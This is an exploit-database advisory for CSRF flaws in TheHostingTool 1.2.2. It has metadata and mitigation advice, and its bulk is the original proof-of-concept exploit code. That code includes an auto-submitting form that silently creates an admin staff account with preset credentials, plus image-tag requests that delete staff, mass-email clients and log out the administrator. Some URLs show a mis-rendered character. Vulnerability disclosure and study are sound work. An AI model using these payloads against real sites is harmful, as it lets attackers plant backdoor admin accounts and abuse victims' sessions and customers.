TheHostingTool 1.2.2 Multiple CSRF Vulnerabilities

vendor:

TheHostingTool

by:

10n1z3d

7,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: TheHostingTool

Affected Version From: 1.2.2

Affected Version To: 1.2.2

Patch Exists: NO

Related CWE: N/A

CPE: a:thehostingtool:thehostingtool:1.2.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

TheHostingTool 1.2.2 Multiple CSRF Vulnerabilities

TheHostingTool 1.2.2 is vulnerable to multiple CSRF attacks. An attacker can create a malicious HTML page that, when visited by an authenticated user, can perform actions on behalf of the user. The malicious HTML page can be used to create a staff account, delete a staff account, mass email the clients, and logout the administrator.

Mitigation:

The application should use a CSRF token to verify that the request is coming from an authenticated user. The application should also use a CAPTCHA to verify that the request is coming from a human.

Source

Exploit-DB raw data:

<!---
    Title: TheHostingTool 1.2.2 Multiple CSRF Vulnerabilities
    Author: 10n1z3d <10n1z3d[at]w[dot]cn>
    Date: Mon 12 Jul 2010 01:19:52 PM EEST
    Vendor: http://thehostingtool.com/
    Download: http://thehostingtool.googlecode.com/files/THT-v1.2.2.zip
--->

-=[ CSRF PoC 1 - Create Staff Account ]=-

    <html>
        <head>
            <title>TheHostingTool 1.2.2 Multiple CSRF Vulnerabilities - Create Staff Account</title>
        </head>
        <body onload="document.csrf.submit();">
            <form name="csrf" action="http://[domain]/admin/?page=staff⊂=add" method="post">
                <!--- Edit these --->
                <input type="hidden" name="user" value="root" />
                <input type="hidden" name="email" value="root@root.com" />
                <input type="hidden" name="name" value="root" />
                <input type="hidden" name="pass" value="rootroot" />
                <input type="hidden" name="conpass" value="rootroot" />
                <!--- Do not edit below --->
                <input type="hidden" name="add" value="Add Staff Account" />
            </form>
        </body>
    </html>
 
-=[ CSRF PoC 2 - Delete Staff Account ]=-

    <img src="http://[domain]/admin/?page=staff⊂=delete&do=root&confirm=1" alt="Do you see this?" />
    
-=[ CSRF PoC 3 - Mass Email The Clients ]=-

    <img src="http://[domain]/includes/ajax.php?function=massemail&subject=owned&msg=pwn" alt="Do you see this?" />

-=[ CSRF PoC 4 - Logout The Administrator ]=-

    <img src="http://[domain]/admin/?page=logout" alt="Do you see this?" />
 
<!---
    http://www.evilzone.org/
    irc.evilzone.org  (6697 / 9999)
--->